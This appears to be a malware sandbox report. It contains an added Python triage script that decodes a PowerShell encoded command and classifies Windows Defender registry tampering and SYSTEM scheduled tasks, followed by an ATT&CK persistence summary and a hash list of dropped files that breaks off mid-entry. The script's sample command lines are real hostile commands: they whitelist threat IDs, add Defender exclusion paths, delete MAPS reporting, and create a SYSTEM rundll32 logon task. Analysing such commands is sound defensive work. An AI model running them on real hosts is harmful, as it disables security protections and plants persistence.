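Triage helper for the command lines recorded in the process tree above. This is an added example, not part of the sandbox report and not code from the sample; the SAMPLE_CMDLINES list is copied from the tree, while the function names and finding labels are this example's own. It does three things a reviewer of this tree wants done mechanically: it decodes the -EncodedCommand payload (PowerShell's base64 wraps UTF-16LE text, which is why a plain base64 decode shows a NUL after every character); it maps each reg.exe write under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender to what it changes (a ThreatIDDefaultAction data value of 6 is Defender's documented Allow code, so the fourteen threat IDs written by the first powershell.exe are whitelisted rather than quarantined, the Exclusions\Paths entries cover every directory the loader goes on to populate, and deleting Spynet\SpyNetReporting removes the MAPS reporting policy); and it flags schtasks /CREATE lines that run as SYSTEM through rundll32 or powershell. Each reg.exe change appears twice in the tree because it is issued once per registry view (/reg:32 and /reg:64), so the pairs are one change, not two. The decoded command can be checked against the tree itself: the depth-1 powershell.EXE spawns gpupdate.exe /force, which is exactly what the payload says.

```python
# Added triage example; not part of the sandbox report. SAMPLE_CMDLINES are copied
# from the process tree above; function names and finding labels are our own.
import base64
import re

DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"

# Data values Defender accepts under Threats\ThreatIDDefaultAction
# (Microsoft's documented codes); 6 tells Defender to allow the threat.
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                  "8": "UserDefined", "9": "NoAction", "10": "Block"}

# "quoted, \" allowed inside" | bare token.  Assumes no argument ends in a
# backslash right before its closing quote, which holds for every line here.
_TOKEN = re.compile(r'"((?:\\.|[^"\\])*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line into arguments, stripping outer quotes."""
    tokens = []
    for m in _TOKEN.finditer(cmdline):
        if m.group(1) is not None:
            tokens.append(m.group(1).replace('\\"', '"'))
        else:
            tokens.append(m.group(2))
    return tokens


def decode_encoded_command(cmdline):
    """Plaintext behind -EncodedCommand (also -e/-ec/-enc): base64 over UTF-16LE."""
    m = re.search(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def classify_reg(cmdline):
    """Describe a reg.exe ADD/DELETE aimed at Defender policy, else None."""
    t = tokenize(cmdline)
    ops = [i for i, x in enumerate(t) if i and x.upper() in ("ADD", "DELETE")
           and t[i - 1].lower().endswith(("reg", "reg.exe"))]
    if not ops or len(t) < ops[0] + 2:
        return None
    op, key, rest, opts = t[ops[0]].upper(), t[ops[0] + 1].lower(), t[ops[0] + 2:], {}
    for j, x in enumerate(rest):
        if x.lower() in ("/v", "/t", "/d") and j + 1 < len(rest):
            opts[x.lower()] = rest[j + 1]
        elif x.lower().startswith("/reg:"):
            opts["/reg"] = x[5:]            # explicit 32- or 64-bit registry view
    if not key.startswith(DEFENDER_POLICY):
        return None
    sub = key[len(DEFENDER_POLICY):].strip("\\")
    f = {"op": op, "subkey": sub, "value": opts.get("/v"), "view": opts.get("/reg", "native")}
    if sub == r"threats\threatiddefaultaction" and op == "ADD":
        f.update(what="threat_default_action", threat_id=opts.get("/v"),
                 action=THREAT_ACTIONS.get(opts.get("/d"), "unknown(%s)" % opts.get("/d")))
    elif sub == r"exclusions\paths" and op == "ADD":
        f["what"] = "exclusion_path_added"
    elif sub == r"exclusions\extensions" and op == "DELETE":
        f["what"] = "exclusion_extension_removed"
    elif sub == "spynet" and op == "DELETE":
        f["what"] = "maps_policy_removed"
    else:
        f["what"] = "defender_policy_change"
    return f


def parse_schtasks(cmdline):
    """Summarise a schtasks /CREATE line; flag SYSTEM tasks and proxy launchers."""
    t = tokenize(cmdline)
    if not t or "schtasks" not in t[0].lower() or "/CREATE" not in [x.upper() for x in t]:
        return None
    opts = {x.upper(): t[j + 1] for j, x in enumerate(t[:-1])
            if x.upper() in ("/TN", "/TR", "/RU", "/SC", "/ST", "/XML")}
    run_as, action = opts.get("/RU", ""), opts.get("/TR", "")
    return {"what": "scheduled_task_created", "name": opts.get("/TN"), "run_as": run_as,
            "schedule": opts.get("/SC"), "action": action, "xml": opts.get("/XML"),
            "runs_as_system": run_as.upper() == "SYSTEM",
            "proxy_launcher": bool(re.search(r"\b(rundll32|powershell)\b", action, re.I))}


def triage(cmdlines):
    """Classify each command line; attach the decoded payload where one exists."""
    findings = []
    for line in cmdlines:
        f = classify_reg(line) or parse_schtasks(line)
        if f is None and "powershell" in line.lower():
            f = {"what": "powershell"}
        if f is None:
            continue
        decoded = decode_encoded_command(line)
        if decoded is not None:
            f["decoded_command"] = decoded
        findings.append(f)
    return findings


SAMPLE_CMDLINES = [  # copied from the process tree above
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\pdqXAj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINES):
        print(finding)
```

The same functions run unchanged over the CommandLine field of Sysmon Event ID 1 or Windows Security 4688 records, which is where this tree's behaviour would have to be caught on a live host; the classifier keys on the policy path rather than on the process name, so a tamper written through PowerShell's registry provider or a dropped .reg file still surfaces as long as the command line carries the key.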
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
- Create or Modify System Process (3): Windows Service (3)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Create or Modify System Process (3): Windows Service (3)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
Filesize: 1.2MB
MD5: 0ccf501f170091054c3ca8aa16092902
SHA1: bfe146d45bb404c64ee25050daa6ad6a57302ef5
SHA256: 49df8da97d362866e8abc9ed3caafdaa239a1805d442008f9670ec7baa8cf055
SHA512: dabfbd68e00fd6b00841355dd003bfae5c70443aafb9b912b6948058a45cec0c2f112a5f551761517783fa9371ea6801c284111e20e3e2b78a01b8e3eb8dedce
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize: 187B
MD5: 2a1e12a4811892d95962998e184399d8
SHA1: 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256: 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512: bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize: 136B
MD5: 238d2612f510ea51d0d3eaa09e7136b1
SHA1: 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256: 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512: 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize: 150B
MD5: 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1: 6a51537cef82143d3d768759b21598542d683904
SHA256: 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512: 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize: 10KB
MD5: b82fec275b011e3682621b2a0f0cc035
SHA1: 2d7e93881e9bedc534cdd4b471421b40c16f3ecc
SHA256: 3f4f4ee22b196bb9b1d4ce64df3b694648c59e49b265aecc9f1401f0a50bda45
SHA512: ccfaa7db69fafab1d23057e938c3105414f062704cde65556f27cc75b7d81933df8d169b1d00fa1bced70cb309b85aba7bb0f67f4c3ead59bd8bd11857bc04db
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\F01YT1OE\edgecompatviewlist[1].xml
Filesize: 74KB
MD5: d4fc49dc14f63895d997fa4940f24378
SHA1: 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256: 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512: cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\MWDEN7OI\B8BxsscfVBr[1].ico
Filesize: 1KB
MD5: e508eca3eafcc1fc2d7f19bafb29e06b
SHA1: a62fc3c2a027870d99aedc241e7d5babba9a891f
SHA256: e6d1d77403cd9f14fd2377d07e84350cfe768e3353e402bf42ebdc8593a58c9a
SHA512: 49e3f31fd73e52ba274db9c7d306cc188e09c3ae683827f420fbb17534d197a503460e7ec2f1af46065f8d0b33f37400659bfa2ae165e502f97a8150e184a38c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\OY912XWC\suggestions[1].en-US
Filesize: 17KB
MD5: 5a34cb996293fde2cb7a4ac89587393a
SHA1: 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512: e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DFFBE329B163A06F48.TMP
Filesize: 16KB
MD5: e51f3c08df36769e4853e8f4eaf9b80a
SHA1: 6d534c3ece2dec97e9f5676c1c106f3a6580f7ce
SHA256: ee423af431a98712b2e75077db54d015fd87ce1e30ce2803dfabe908a2b6fed1
SHA512: dfe7a632a4301d446b260bbc742c69ade075c91ec86d7b7570e160381786c6553dc12463f849a267ba8539e11b6741d0c3aa416bdcaee62e839e6f4a38ca34c1
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\64DQX6TN\intersection-observer.min[1].js
Filesize: 5KB
MD5: 936a7c8159737df8dce532f9ea4d38b4
SHA1: 8834ea22eff1bdfd35d2ef3f76d0e552e75e83c5
SHA256: 3ea95af77e18116ed0e8b52bb2c0794d1259150671e02994ac2a8845bd1ad5b9
SHA512: 54471260a278d5e740782524392249427366c56b288c302c73d643a24c96d99a487507fbe1c47e050a52144713dfeb64cd37bc6359f443ce5f8feb1a2856a70a
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\64DQX6TN\spf[1].js
Filesize: 40KB
MD5: 892335937cf6ef5c8041270d8065d3cd
SHA1: aa6b73ca5a785fa34a04cb46b245e1302a22ddd3
SHA256: 4d6a0c59700ff223c5613498f31d94491724fb29c4740aeb45bd5b23ef08cffa
SHA512: b760d2a1c26d6198e84bb6d226c21a501097ee16a1b535703787aaef101021c8269ae28c0b94d5c94e0590bf50edaff4a54af853109fce10b629fa81df04d5b3
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\B71OFA8F\KFOlCnqEu92Fr1MmEU9vBg[1].woff2
Filesize: 49KB
MD5: 08c655068d5dd3674b4f2eaacb470c03
SHA1: 9430880adc2841ca12c163de1c1b3bf9f18c4375
SHA256: 4fc8591cc545b7b4f70d80b085bf6577fad41d5d30ddd4f0d0c8ab792084c35e
SHA512: b2fce4bc018fa18de66095cc33d95455a4d544e93d512b02bcb8af06aadb550cd0f4aecbceaa013857196c91b6e3c4565a199835cfb37c682cb7bddb69420198
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\B71OFA8F\KFOlCnqEu92Fr1MmSU5vBg[1].woff2
Filesize: 49KB
MD5: 8a62a215526d45866385d53ed7509ae8
SHA1: 5f22bfd8ff7dab62ac11b76dee4ef04b419d59b5
SHA256: 34ccd21cf8cc2a2bdcd7dbe6bef05246067ff849bf71308e207bf525f581763d
SHA512: 845f721e564e03955c34607c9c9cf4000db46788313ebf27c1d12473c7948cf2609b08b24093c5d01f6c97acc79456e7aa838c291462bfb19700bbfd07ee243f
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\B71OFA8F\KFOmCnqEu92Fr1Me4A[1].woff2
Filesize: 49KB
MD5: ee26c64c3b9b936cc1636071584d1181
SHA1: 8efbc8a10d568444120cc0adf001b2d74c3a2910
SHA256: d4d175f498b00516c629ce8af152cbe745d73932fa58cc9fdfc8e4b49c0da368
SHA512: 981a0d065c999eea3c61a2ba522cb64a0c11f0d0f0fe7529c917f956bce71e1622654d50d7d9f03f37774d8eee0370cfb8a86a0606723923b0e0061e1049cbc6
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\B71OFA8F\network[1].js
Filesize: 16KB
MD5: d954c2a0b6bd533031dab62df4424de3
SHA1: 605df5c6bdc3b27964695b403b51bccf24654b10
SHA256: 075b233f5b75cfa6308eacc965e83f4d11c6c1061c56d225d2322d3937a5a46b
SHA512: 4cbe104db33830405bb629bf0ddceee03e263baeb49afbfb188b941b3431e3f66391f7a4f5008674de718b5f8af60d4c5ee80cfe0671c345908f247b0cfaa127
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\B71OFA8F\scheduler[1].js
Filesize: 9KB
MD5: 3c38e345189d10c70793533ba5f04ee1
SHA1: 130afb88e1c146ac2d2330943f18f507e93a6917
SHA256: fd4b34a44fee844ad070594220a3a87cfe742ae69acfd94e776699d41e3b4a0c
SHA512: d590dfff6e67094acafb5ef18c19783dc2e5b970b40403e90276a67463cbf2147ea25782d5addd09b93107a900805024f68bda770ca11de2136da574d870774d
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\B71OFA8F\webcomponents-ce-sd[1].js
Filesize: 95KB
MD5: 58b49536b02d705342669f683877a1c7
SHA1: 1dab2e925ab42232c343c2cd193125b5f9c142fa
SHA256: dea31a0a884a91f8f34710a646d832bc0edc9fc151ffd9811f89c47a3f4a6d7c
SHA512: c7a70bdefd02b89732e12605ad6322d651ffa554e959dc2c731d817f7bf3e6722b2c5d479eb84bd61b6ee174669440a5fa6ac4083a173b6cf5b30d14388483d4
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\BRK32DG0\desktop_polymer_enable_wil_icons[1].js
Filesize: 9.9MB
MD5: 8ca9fac7776c395810fd3ee4a821dbcf
SHA1: 8e68525b9e20092c8336d0fcf43fda569117fa03
SHA256: 0f82454ae1ed8abeab95da94ba833124f0b3c05415e31cd10400c036c65499f3
SHA512: 170e3ed5794bf404cead311c460be60db18db9cf71d846587cdb67d91bd312e7f3221a9a0f1940b6c8b109d304351761e7d22ab4d8cbed6ad9c3ed3e5b567ed7
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\BRK32DG0\rs=AGKMywF2nbClGl-5_J3GnagT2STDJgq_Zg[1].css
Filesize: 213KB
MD5: 1c39f2f0f1da1bb55a63c178aea861ee
SHA1: 64f330e58c472932674434f880d0b6da8a992918
SHA256: 16181dccaa1d9a2c5e8daf37553fbaff8c756f532fc6177cbb242ec887fc38a8
SHA512: 00164346a06e98812e027872775fdb90f4435b08f0f75fa8160517de4f92904bb7228514d9ec981a6a1348ba21e4282be8e69f2e53843a3f70b082670b8467bd
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\BRK32DG0\web-animations-next-lite.min[1].js
Filesize: 49KB
MD5: cb9360b813c598bdde51e35d8e5081ea
SHA1: d2949a20b3e1bc3e113bd31ccac99a81d5fa353d
SHA256: e0cbfda7bfd7be1dcb66bbb507a74111fc4b2becbc742cd879751c3b4cbfa2f0
SHA512: a51e7374994b6c4adc116bc9dea60e174032f7759c0a4ff8eef0ce1a053054660d205c9bb05224ae67a64e2b232719ef82339a9cad44138b612006975578783c
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\BRK32DG0\www-main-desktop-home-page-skeleton[1].css
Filesize: 12KB
MD5: 770c13f8de9cc301b737936237e62f6d
SHA1: 46638c62c9a772f5a006cc8e7c916398c55abcc5
SHA256: ec532fc053f1048f74abcf4c53590b0802f5a0bbddcdc03f10598e93e38d2ab6
SHA512: 15f9d4e08c8bc22669da83441f6e137db313e4a3267b9104d0cc5509cbb45c5765a1a7080a3327f1f6627ddeb7e0cf524bd990c77687cb21a2e9d0b7887d4b6d
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\BRK32DG0\www-main-desktop-watch-page-skeleton[1].css
Filesize: 13KB
MD5: 2344d9b4cd0fa75f792d298ebf98e11a
SHA1: a0b2c9a2ec60673625d1e077a95b02581485b60c
SHA256: 682e83c4430f0a5344acb1239a9fce0a71bae6c0a49156dccbf42f11de3d007d
SHA512: 7a1ac40ad7c8049321e3278749c8d1474017740d4221347f5387aa14c5b01563bc6c7fd86f4d29fda8440deba8929ab7bb69334bb5400b0b8af436d736e08fab
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\BRK32DG0\www-onepick[1].css
Filesize: 1011B
MD5: 5306f13dfcf04955ed3e79ff5a92581e
SHA1: 4a8927d91617923f9c9f6bcc1976bf43665cb553
SHA256: 6305c2a6825af37f17057fd4dcb3a70790cc90d0d8f51128430883829385f7cc
SHA512: e91ecd1f7e14ff13035dd6e76dfa4fa58af69d98e007e2a0d52bff80d669d33beb5fafefe06254cbc6dd6713b4c7f79c824f641cb704142e031c68eccb3efed3
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\PJJVV5UQ\KFOlCnqEu92Fr1MmWUlvBg[1].woff2
Filesize: 49KB
MD5: 90f0b37f809b546f34189807169e9a76
SHA1: ee8c931951df57cd7b7c8758053c72ebebf22297
SHA256: 9dcacf1d025168ee2f84aaf40bad826f08b43c94db12eb59dbe2a06a3e98bfb2
SHA512: bd5ff2334a74edb6a68a394096d9ae01bd744d799a49b33e1fd95176cbec8b40d8e19f24b9f424f43b5053f11b8dd50b488bffedd5b04edbaa160756dd1c7628
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\PJJVV5UQ\css2[1].css
Filesize: 2KB
MD5: 84d3f5474bafdc0914cd457203eefe4d
SHA1: 44fab3b0f2229f96bfae8ff4dd71f39c3c4043c3
SHA256: 914015cac1ab3f912a9787e9b7768739d12ca490d8f40ca964e36a052ecd3037
SHA512: 5a78adb470706ac61565d3b6732227bc4f944a8505de054a18acb5a2da319512b3e401c45c7ba625e5a5d5ed7d3122e81f0653a61b55d47abf7fb4ee4d115877
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\PJJVV5UQ\www-i18n-constants[1].js
Filesize: 5KB
MD5: f3356b556175318cf67ab48f11f2421b
SHA1: ace644324f1ce43e3968401ecf7f6c02ce78f8b7
SHA256: 263c24ac72cb26ab60b4b2911da2b45fef9b1fe69bbb7df59191bb4c1e9969cd
SHA512: a2e5b90b1944a9d8096ae767d73db0ec5f12691cf1aebd870ad8e55902ceb81b27a3c099d924c17d3d51f7dbc4c3dd71d1b63eb9d3048e37f71b2f323681b0ad
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\PJJVV5UQ\www-tampering[1].js
Filesize: 10KB
MD5: 6e42026d4a6ff98133b63dc109fb6deb
SHA1: 39fa64ddaebe912df187a8178d9f82d475596897
SHA256: ad24e95c9bc8af1148e10b05e65a0058172af5839e3795a96fe0706fe1cbcf53
SHA512: 9192662fb2e67e30a3842f7cd8949c1179dd9976527135e9407728d2a2e9b0da745f427684661a2567dc582a1ea1b441372fef81215c50c3ee870f66a5aaefa7
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\DKHEBBX7.cookie
Filesize: 136B
MD5: b47a813c9bea20b5a46c7dc9010035a3
SHA1: 60ac097d626ef2b36419cc88b59703f9d51ce7d2
SHA256: 97916a88c9d6c805af7722182947a74b4f8244ef9ec3b4dcc25847b88d47f6b9
SHA512: 44c9674046fd5e4b77c39c00fad9fdddaed40d96b2b491cbdba7040464974016a767c6e2ead06e4d0186053961337e916257570eeb78e583af078dfa578939b0
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\F0HNA18K.cookie
Filesize: 132B
MD5: 2a53163d0a03aaaf45cfb0bb11498e3f
SHA1: 9f880a5510b406039333437adaef6d5f15ecdd12
SHA256: 3cc2c226c8f6b3ec35540eeb39ee15f6c9959c81c4275458a9fddc7210885e94
SHA512: 882634f57a2ab180e21664b89f70f0bb3360651c6dc0713b61836b22f07329587e5e5427fbf10f3cd4e40141c0a24ba56705d28ab9f04d60fe5a30e3f6cdd59f
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\J16CHTHW.cookie
Filesize: 263B
MD5: d83452ec82eafe32b04b588a24a24621
SHA1: 375b312fc20873d27904bb52c5fc0b719d88dd3b
SHA256: 048ced801aff2b969a13cfd0d928e5f0f273f267f41f0a2e8113e8d9c1383156
SHA512: 20b38fc72d5eed726720a03cc1afe8f38d508941ac407e0ba9acafcac00eaee01005b44e29df6849b746f28cdd2cf52c49fb90da5d40d7a49d8069df95e519ac
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize: 1KB
MD5: eb7d4ea5a1175745bbf27eb49f2fff01
SHA1: 0bfe4160e158ad13e950f8e340be9a310766fecc
SHA256: 2bae3674f2777b2f755f4079cefb0bda25051a2a79d7c3e87361813fb3ce8b33
SHA512: 0b7ad143ee95d5ca9c02b96c34054f4c116477ad1ebd56cd01ef117b9f3792adc6247d01554ea0cd1826e91f6812ea52ce3aaf4812203ff7766bbd0bf7e62a8a
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAFilesize
1KB
MD5eb7d4ea5a1175745bbf27eb49f2fff01
SHA10bfe4160e158ad13e950f8e340be9a310766fecc
SHA2562bae3674f2777b2f755f4079cefb0bda25051a2a79d7c3e87361813fb3ce8b33
SHA5120b7ad143ee95d5ca9c02b96c34054f4c116477ad1ebd56cd01ef117b9f3792adc6247d01554ea0cd1826e91f6812ea52ce3aaf4812203ff7766bbd0bf7e62a8a
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FBFilesize
472B
MD54407c6a073f34b381a711bb2694370c5
SHA139bd212df9740248e53e3e55bc81a0940d6550e4
SHA256eecce2b1c8238d5445f2482c110cbc408f27c7d0525021c2107bd698dc2ac97e
SHA512cddd96b366e3874218f88b2e734151484abb95861be8ebeede82cb91ab21b1c4e2121a60b37880a7ed2fffdae18a2a03ecdb1be17ad941ef90f8dcb38a335bb7
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBAFilesize
724B
MD5ac89a852c2aaa3d389b2d2dd312ad367
SHA18f421dd6493c61dbda6b839e2debb7b50a20c930
SHA2560b720e19270c672f9b6e0ec40b468ac49376807de08a814573fe038779534f45
SHA512c6a88f33688cc0c287f04005e07d5b5e4a8721d204aa429f93ade2a56aeb86e05d89a8f7a44c1e93359a185a4c5f418240c6cdbc5a21314226681c744cf37f36
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBAFilesize
724B
MD5ac89a852c2aaa3d389b2d2dd312ad367
SHA18f421dd6493c61dbda6b839e2debb7b50a20c930
SHA2560b720e19270c672f9b6e0ec40b468ac49376807de08a814573fe038779534f45
SHA512c6a88f33688cc0c287f04005e07d5b5e4a8721d204aa429f93ade2a56aeb86e05d89a8f7a44c1e93359a185a4c5f418240c6cdbc5a21314226681c744cf37f36
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_249A1AAD948A044308274CC39E5A79B2Filesize
472B
MD5d3bd824039ae7197144108945af4d926
SHA121e3a371c75d786426d5537a90e9aa16da7eba72
SHA2567316bfc05de4da91186a708024b4156b9d71cdb9a79bebf8f64efd2ba41cd592
SHA51268e1a052274065f8aa8394ea763e06b1b19a5416263ea84120ad00d2848303c8c038e72fd2f42996bbb29c3bdce71c0b221b6f3a57d78c7b9ae757ed1b7554ff
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_43B91371270367D9BB0D22249072D2B2Filesize
472B
MD57eb93032e17a7fee03a208b07e3b29d3
SHA1d0315fdad612e1c5c8093beb3da8a613a57d077f
SHA2565b785fcaea993661739ce1101acaf3f582bf6aae5089fa71803e856777b30633
SHA5127bec4101c4e5a70b58d9def1301e64aff627f3495d32710a909cc1c9b81267fe107615a537406038f78b038fde1f9ae9fd4c82f989feb0a2361e7813fbe36d20
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAFilesize
410B
MD5fea37c82f7af55884f05755c33d64dee
SHA15e0e2ae5f1f2a6dcec58fe5d7bd7955616573ff8
SHA256eed35cf313c0b9b536461049b0f035bedb36914b53938812c4f98b671afddd15
SHA5124a4d98a9592e61fa2c2132d14fabb7303052b02c457170c0c2becfdc9e3b0cdad8f95db95b14e0ea1f40f1af84bec6a21128744511a0b076c764b24c1219ef47
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAFilesize
410B
MD5e16afc1410d4269ecec3cf81804ed629
SHA15cad031e32290d48d1244616d532c55c00b28f96
SHA256e3eafbf0a2e2ac530cebd89c5d73abe3b1dfede3d7d436709e04502c35b2aad4
